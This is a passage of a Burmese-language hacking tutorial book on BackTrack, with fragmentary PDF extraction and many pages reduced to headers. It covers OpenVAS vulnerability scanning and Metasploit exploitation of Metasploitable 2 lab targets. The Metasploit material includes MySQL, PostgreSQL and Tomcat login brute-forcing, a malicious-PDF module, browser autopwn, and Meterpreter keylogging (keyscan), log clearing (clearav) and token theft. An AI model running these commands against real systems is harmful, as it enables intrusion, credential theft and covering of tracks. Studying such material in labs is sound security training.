ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
104 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
#!/bin/bash
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd --backup
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
မ်က္ပြင့္စာေပ 105
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၃။ Username သတ္မွတ္ေပးရပါမည္။
၄။ Password သတ္မွတ္ေပးရပါမည္။
106 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၄။ Base အတြက္ Empty> Static and fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ၄င္း Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ျပဳလုပ္ရန္အတြက္ ခြင့္ျပဳေပးမည္ျဖစ္ပါသည္။
၆။ Scan Config ကိုျပင္ဆင္လိုေသာအခါ Local Vulnerabilities ေဘးမွ Wrench Icon ေပၚတြင္ Click
ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 107
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ ေတြ႕ရိွေသာ Local Family တစ္ခုစီအတြက္ Select all NVT box တြင္ အမွန္ျခစ္ျပဳလုပ္ေပးရပါမည္။
Family ဆိုသည္မွာ Vulnerability မ်ား၏ အစုအေ၀းပင္ျဖစ္ပါသည္။ ေရြးခ်ယ္ရမည္႕ Vulnerability မ်ားမွာ
Compliance
Credentials
Default Accounts
Denial of Service
FTP
Ubuntu Local Security Checks
108 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 109
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၅။ Scan ျပဳလုပ္ရန္အတြက္ Play Button တြင္ Click ႏိွပ္ပါ။ ယခုေနရာတြင္ Local Vulnerabilities Scan
ျဖစ္သည္ကို သတိထားရပါမည္။
ယခုအပိုင္းတြင္ OpenVAS ကို ဖြင့္၍ Web Based Interface တြင္ Log In ၀င္ေရာက္ျခင္းကို ျပဳလုပ္ခဲ့ၾက
ပါသည္။ ထို႕ေနာက္ OpenVAS ကို Local Vulnerabilities ကို ရွာေဖြရန္အတြက္ Configure ျပဳလုပ္ရပါ
မည္။ ေနာက္ဆံုးအေနျဖင့္ Target ကိုေရြးခ်ယ္ကာ Scan ကို ၿပီးဆံုးေအာင္အထိ ျပဳလုပ္ပံုကို ေဖာ္ျပခဲ့ပါ
သည္။ OpenVAS သည္ NVT Feed အပါအ၀င္ သိရိွၿပီးေသာ Vulnerabilities မ်ားကို List ျပဳလုပ္ရန္ Scan
ျပဳလုပ္ရမည္ျဖစ္သည္။
၂။ Local Vulnerabilities Scan ေဘးတြင္ရိွေသာ ခရမ္းေရာင္ Magnifying Glass (မွန္ဘီလူးပံု) တြင္ Click
ႏိွပ္ေပးရပါမည္။
110 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 111
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Windows XP
Windows 7
Metasploitable 2
Any Other Flavor of Linux
၄။ Base အတြက္ Empty> Static and Fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ေစႏိုင္မည္ျဖစ္ပါသည္။
112 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ ထိ႕ု ေနာက္ Scan Config ကို Edit ျပဳလုပ္ရန္လိုအပ္ပါမည္။ Network Vulnerabilities ေဘးတြင္ရိွ ေသာ
Wrench Icon ကို Click ႏိွပ္ေပးရပါမည္။
၇။ Ctrl +F ကိုတႏ
ြဲ ိွပ္ၿပီး Find Bar တြင္ Network ဟုရိုက္ထည္႕ေပးရပါမည္။
မ်က္ပြင့္စာေပ 113
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Netware
NMAP NSE
Peer-To-Peer File Sharing
Port Scanners
Privilege Escalation
Product Detection
RPC
Remote File Access
SMTP Problems
SNMP
Service detection
Settings
Wireless Services တို႕ျဖစ္သည္။
114 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
i. Target ၏ အမည္ကိုသတ္မွတ္ေပးရမည္။
ii. Hosts ကိုသတ္မွတ္ႏိုင္ရန္အတြက္ ေအာက္ပါ နည္းလမ္းတစ္မ်ိဳးမ်ိဳးကို အသံုးျပဳရပါမည္။
Address ကိုထည္႕သြင္းျခင္း
ဥပမာ - 192.168.0.10
Address မ်ားကို Comma ခံၿပီးထည္႕သြင္းျခင္းျဖင့္ျဖစ္ေစ
ဥပမာ - 192.168.0.10ယ 192.168.0.115
Adddress ၏ Range ကိုသတ္မွတ္ေပးျခင္းျဖင့္ျဖစ္ေစ
ဥပမာ - 192.168.0.1-20
မ်က္ပြင့္စာေပ 115
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းတြင္ OpenVAS ကို Launch ျပဳလုပ္ၿပီး Web-based Interface ကို Log int ျပဳလုပ္ျခင္းကို
လုပ္ေဆာင္ေပးခဲ့ၾကပါသည္။ Network Vulnerabilities မ်ားကို ရွာေဖြရန္အတြက္ OpenVAS ကို
Configure ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ခဲ့ပါသည္။ ေနာက္ဆံုးတြင္ Target ကိုေရြးခ်ယ္ၿပီးေနာက္ Vulner-
abilities ကို ၿပီးဆံုးေအာင္လုပ္ေဆာင္ျခင္းကို လုပ္ေဆာင္ခဲ့ပါသည္။ OpenVAS သည္ အထက္တြင္
ေဖာ္ျပထားေသာ စာရင္းအရ NVT Feed အပါအ၀င္ ရွာေဖြေတြ႕ရိွၿပီးျဖစ္ေသာ Vulnerabilties မ်ားကို
ရွာေဖြႏိုင္မည္ျဖစ္သည္။
116 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 117
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Metasploitable 2
Any other flavor of linux
၁။ OpenVAS ကို Log In ျပဳလုပ္ရန္အတြက္ Web Browser ၏ Address bar တြင္ http://127.0.0.1
:9392 ဟုရိုက္ထည္႕ေပးရပါမည္။
၄။ Base အတြက္ Empty, Static and fast option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထုိ Option သည္ Scratch မွ
စတင္ေစရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ကိုဖန္တီးတည္ေဆာက္ရပါမည္။
118 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၆။ Scan ျပဳလုပ္မည္႕ Config ဖိုင္ကို ျပင္ဆင္ေပးရပါမည္။ ထို႕ေၾကာင့္ Linux Vulnerability မ်ားကို ရွာေဖြ
ရန္အတြက္ Wrench Icon ကို Click ျပဳလုပ္ရပါမည္။
၈။ ေတြ႕ရိွၿပိးေသာ Family တစ္ခုစီအတြက္ Select all NVT box မ်ားကို အမွန္ျခစ္ေပးရပါမည္။ ေရြးခ်ယ္
ထားၿပီးေသာ အားနည္းခ်က္ယိုေပါက္မ်ားမွာ
မ်က္ပြင့္စာေပ 119
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
SNMP
Service detection
Settings
Wireless services
Web Servers
120 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
အသံုးျပဳႏိုင္ပါသည္။
၁၃။ ထို႕ေနာက္ Scan management> New Task ကို ေရြးခ်ယ္ၿပီးေနာက္ ေအာက္ပါ လုပ္ေဆာင္ခ်က္မ်ား
ကို လုပ္ေဆာင္ေပးရပါမည္။
i. Task ၏အမည္ကိုသတ္မွတ္ေပးရပါမည္။
ii. Comment တစ္ခုကို ဆႏၵရိွပါက ထည္႕သြင္းေပးႏုိင္ပါသည္။
iii. Scan Configuration ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ Linux Vulnerabilities ဟု
သံုးစြပ
ဲ ါမည္။
iv. Scan Targets ကိုေရြးခ်ယ္ေပးပါမည္။ ယခုေနရာတြင္ Local Network ဟုသံုးစြပ
ဲ ါမည္။
v. အျခားေသာ Option မ်ားကို ျပင္ဆင္ေပးရန္မလိုပါ။
vi. Create Task တြင္ Click ႏိွပ္ပါ။
၁၅။ Scan ျပဳလုပ္ရန္ Play Button တြင္ Click ႏိွပ္ပါ။ ယခုေနရာတြင္ Scan အမည္သည္ Linux
Vulnerabilities Scan ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 121
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၂။ Linux Vulnerabilities Scan ကိုဆက္လုပ္ျပဳလုပ္ရန္ Purple Magnifying Glass တြင္ Click ႏိွပ္ပါ။
122 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Windows XP
Windows 7
၁။ OpenVAS ကို Log In ၀င္ေရာက္ႏိုင္ေစရန္ Mozilla Firefox ၏ Address Bar တြင္ http://127.0.0.1
:9392 ဟူ၍ ရိုက္ထည္႕ေပးရပါမည္။
၄။ Base အတြက္ Empty, Static and Fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ဖိုင္ကို ဖန္တီးရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 123
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
124 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
SMTP Problems
SNMP
Service detection
Web Servers
Windows
Windows : Microsoft Bulletins တို႕ျဖစ္သည္။
၉။ Configuration>Targets သို႕သြားေရာက္ပါ။
မ်က္ပြင့္စာေပ 125
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
လုပ္ေဆာင္ႏိုင္ပါသည္။
126 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၄။ Windows Vulnerabilities Scan ျပဳလုပ္ျခင္းကို ေရွ႕ဆက္ရန္ Play ခလုတ္တြင္ click ႏိွပ္ပါ။
၂။ Window Vulnerabilities Scan ျပဳလုပ္ရန္ ခရမ္းေရာင္ Magnifying Glass (မွန္ဘီလူးပံု) ေပၚတြင္ Click
ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 127
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
128 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 5
Exploitation
ထိုးေဖာက္၀င္ေရာက္ျခင္း
မ်က္ပြင့္စာေပ 129
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ႈIntroduction
Vulnerability ရွာေဖြျခင္း လုပ္ငန္းစဥ္မ်ားကို ေလ့လာၿပီးေသာအခါတြင္ Target System မ်ားကို
တိုက္ခိုက္ရန္ Exploit မ်ားေမာင္းႏွင္ေပးၿပီး Attack ျပဳလုပ္ရန္ ႀကိဳးပမ္းမႈကို အနည္းငယ္မွ် ဗဟုသုဓ ရရိွၿပီး
ျဖစ္သည္ဟု ေမွ်ာ္လင့္ပါသည္။ ယခုအခန္းတြင္ System မ်ားကို စမ္းသပ္ျခင္း၏ Swiss Army Knife
ျဖစ္ေသာ Metasploit ဟူေသာ Tool အပါအ၀င္ Tool အမ်ိဳးမ်ိဳး၏ အသံုးျပဳပံုမ်ားကို ရွင္းျပေပးသြားမည္ျဖစ္
ပါသည္။ ယခုအခန္းတြင္ ေလ့လာရမည္႕ အပိုင္းမ်ားမွာ
130 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 131
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
132 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Internet Connection
အနည္းဆံုး 8 GB ပမာဏရိွေသာ VirtualBox အသံုးျပဳသည္႕ PC
Unzipping Tool (Window Machine တြင္အသံုးျပဳရန္အတြက္ 7 Zip Application ကိုအ
သံုးျပဳရန္အၾကံျပဳပါသည္။)
http://sourceforge.net/projects/metasploitable/files/Metasploitable2
မ်က္ပြင့္စာေပ 133
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
134 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ ထို႕ေနာက္ RAM ကို 512MB ပမာဏကို သတ္မွတ္ေပးရပါမည္။ ထို႕ေနာက္ Next တြင္ Click ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 135
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
136 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
138 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 139
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
armitage
140 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 141
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
msfconsole
search linux
use /auxiliary/analyze/jtr_linux
show options
142 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
exploit
မ်က္ပြင့္စာေပ 143
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
144 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
msfcli
msfcli –h
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas A
မ်က္ပြင့္စာေပ 145
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas S
146 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas O
/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas E
Mastering Metepreter
Armitage, MSFCLI သိ႕ု မဟုတ္ MSFCONSOLE တစ္ခုခုကိုအသံုးျပဳၿပီး Host ကို ၀င္ေရာက္ထားၿပီးသည္႕
အခါတြင္ Payload မ်ားကို ျဖန္႕ေ၀ရန္ (Deliver) အတြက္ Meterpreter ကိုအသံုးျပဳရပါမည္။ Meterpreter
မွ လက္ရိွ Payload ႏွင့္ Exloit engagement မ်ားျပဳလုပ္ေနစဥ္တြင္ MSFCONSOLE ကို Session မ်ားကို
Manage ျပဳလုပ္ရန္ အသံုးျပဳရပါမည္။
148 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ေစရန္အတြက္
၂။ Exploit ျဖင့္ တိုက္ခိုက္ထားေသာ System ၏ User မ်ားမွ ရိုက္ႏိွပ္ေသာ Keystroke မ်ားကို စတင္
ဖမ္းယူၾကည္႕ပါမည္။
မ်က္ပြင့္စာေပ 149
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
keyscan_start
keyscan_dump
keyscan_stop
clearav
ps
၈။ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ Process တစ္ခုကို Kill ျပဳလုပ္ရန္အတြက္ Kill [pid] Command ကို
သံုးစြႏ
ဲ ိုင္ပါသည္။ ေအာက္တြင္ ဥပမာကိုေဖာ္ျပထားပါသည္။ ေလ့လာၾကည္႕ပါရန္
kill 6353
steal_token
150 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Metasploitable MYSQL
ယခုအပိုင္းတြင္ MySQL Scanner module ကိုအသံုးျပဳျခင္းျဖင့္ MySQL database server ကို Attack
ျပဳလုပ္ရန္အတြက္ Metasploit အသံုးျပဳပံုကို ေလ့လာၾကည္႕ၾကပါမည္။ Drupal ႏွင့္ Wordpress အပါအ၀င္
မ်ားစြာေသာ Website Platform မ်ားတြင္ MySQL database server ကိုလက္ရိွအသံုးျပဳလ်က္ရိွပါသည္။
ထိုအခ်က္သည္ Metasploitable MyQL Attack ျပဳလုပ္ရန္အတြက္ လြယ္ကူေသာ Target မ်ားျဖစ္လာပါ
သည္။
မ်က္ပြင့္စာေပ 151
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
msfconsole
search mysql
use auxiliary/scanner/mysql/mysql_login
show options
152 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၉။ Exploit ကိုေမာင္းႏွင္ရပါမည္။
exploit
မ်က္ပြင့္စာေပ 153
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Metasploitable PostgreSQL
ယခုအပိုင္းတြင္ PostgreSQL Scanner module ကိုအသံုးျပဳျခင္းျဖင့္ PostgreSQL database server
တစ္ခုကို attack လုပ္ရန္မည္ကဲ့သို႕အသံုးျပဳရမည္ ဆိုသည္႕အခ်က္ကိုေဖာ္ျပေပးထားပါသည္။ Postgre
SQL ကို ကမၻာ့အဆင့္အျမင့္ဆံုး Open Source database ဟုခ်ီးက်ဴးမႈမ်ားအျပင္ မ်ားစြာေသာ အသံုးျပဳသူ
154 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းကိုလုပ္ေဆာင္ႏိုင္ရန္အတြက္
msfconsole
search postgresql
မ်က္ပြင့္စာေပ 155
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
show options
156 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
exploit
မ်က္ပြင့္စာေပ 157
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Metasploitable Tomcat
ယခုအပိုင္းတြင္ Tomcat Manager Login Module ကိုအသံုးျပဳ၍ Tomcat Server တစ္ခုကို Attack
ျပဳလုပ္ျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Metasploit ကိုမည္ကဲ့သို႕ အသံုးျပဳမည္
ကို စူးစမ္းၾကည္႕ၾကပါမည္။ Tom သိ႕ု မဟုတ္ Apache Tomct သည္ Open Source Web Server
တစ္ခုျဖစ္ၿပီး Java Servlet မ်ားႏွင့္ JavaServer Pages မ်ားကိုေမာင္းႏွင္ရန္အတြက္ Servlet continer
တစ္ခုဟုလည္းဆိုႏိုင္ပါသည္။ Tomcat ကို Java စစ္စစ္ျဖင့္သာေရးသားထားျခင္းျဖစ္ၿပီး ယခုအပိုင္းတြင္
Tomcat Login ကုိ Brute Force Attack ျပဳလုပ္ရန္အတြက္ Metasploit အသံုးျပဳရျခင္းကို ေလ့လာၾကည္႕
ၾကမည္ျဖစ္ပါသည္။
ယခုအပို္င္းကိုအသံုးျပဳရန္အတြက္
msfconsole
search tomcat
158 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
use auxiliary/scanner/http/tomcat_mgr_login
show options
exploit
Metasploitable PDF
ယခုအပိုင္းတြင္ Adobe PDF Embedded module ကိုအသံုးျပဳ၍ Portable Document Format (PDF)
Document တစ္ခုကို Password ရွာေဖြျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ ထိုသို႕ရွာေဖြရန္အတြက္ကိုလည္း
ထံုးစံအတိုင္း Metasploit ကိုအသံုးျပဳရပါမည္။ Adobe PDF တစ္ခုကို တစ္ေနရာ ေနာက္တစ္ေနသို႕
Document တစ္ခုအျဖစ္ပို႕ေဆာင္ႏိုင္ရန္အတြက္ စံအျဖစ္ သတ္မွတ္ေလ့ရိွပါသည္။ ထိုကဲ့သို႕ အသံုးတြင္
က်ယ္ျခင္းေၾကာင့္ စစ္မွန္ေသာ PDF document ဟုထင္ေစျခင္းျဖင့္ အသံုးျပဳသူ၏ Machine ကို တိုက္ခိုက္
ေစရန္အတြက္ အသံုးျပဳနိုင္ပါသည္။
ယခုအပိုင္းကို စတင္ေစရန္အတြက္
msfconsole
search pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
မ်က္ပြင့္စာေပ 161
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ Exploit ကုိေမာင္းႏွင္ေပးရပါမည္။
exploit
162 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
msfconsole
search autopwn
မ်က္ပြင့္စာေပ 163
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
use auxiliary/server/browser_atuopwn
show options
164 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၈။ ထိ႕ု အျပင္ URI path ကိုသတ္မွတ္ရန္ လိုအပ္ပါမည္။ ယခုေနရာတြင္ “filetypes” (“” ကိုပါ ထည္႕သြင္း
အသံုးျပဳရပါမည္) ကိုအသံုးျပဳရပါမည္။
exploit
session –i 1
help
keyscan_start
မ်က္ပြင့္စာေပ 165
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
keyscan_dump
166 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 6
Privilege Escalation
အထူးအခြင့္အေရးေတာင္းဆိုျခင္း
မ်က္ပြင့္စာေပ 167
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
စနစ္တစ္ခုကို Attack ျပဳလုပ္ၿပီးေနာက္ ထို ကြန္ပ်ဴတာစနစ္အတြင္းသို႕ ၀င္ေရာက္ႏိုင္သြားေသာအခါတြင္
အေရးႀကီးေသာအခ်က္တစ္ခုအျဖစ္ ျပဳလုပ္ရမည္႕အခ်က္တစ္ခုမွာ ျဖစ္ႏိုင္သမွ် အခြင့္အေရး (Privilege)
ကို တိုးျမွင့္ရန္ (escalate) ျခင္းတို႕ကို လုပ္ေဆာင္ရန္ျဖစ္သည္။ အႀကမ္းျဖင္းအားျဖင့္ ထုိးေဖာက္၀င္ေရာက္
ေသာအခါ ရရိွလာမည္႕ Account သည္ လုပ္ပိုင္ခြင့္အားနည္းေသာ (Low Privilege) Computer User
မ်ားသာ ျဖစ္ေလ့ရိွပါသည္။ သို႕ရာတြင္ အမွန္တကယ္ ထိုးေဖာက္လိုေသာ Account သည္ Administrator
Account သာျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ ယခုအခန္းတြင္ အခြင့္အေရးကို တိုးၿမွင့္ျခင္း (သာမန္ User Account
မွ Administrator Account သိ႕ု တိုးၿမွင့္ျခင္း) နည္းလမ္းမ်ားကို ေဖာ္ျပေဆြးေႏြးသြားၾကမည္ျဖစ္သည္။ ယခု
အခန္းတြင္ ေလ့လာရမည္႕ အပိုင္းမ်ားမွာ
168 မ်က္ပြင့္စာေပ
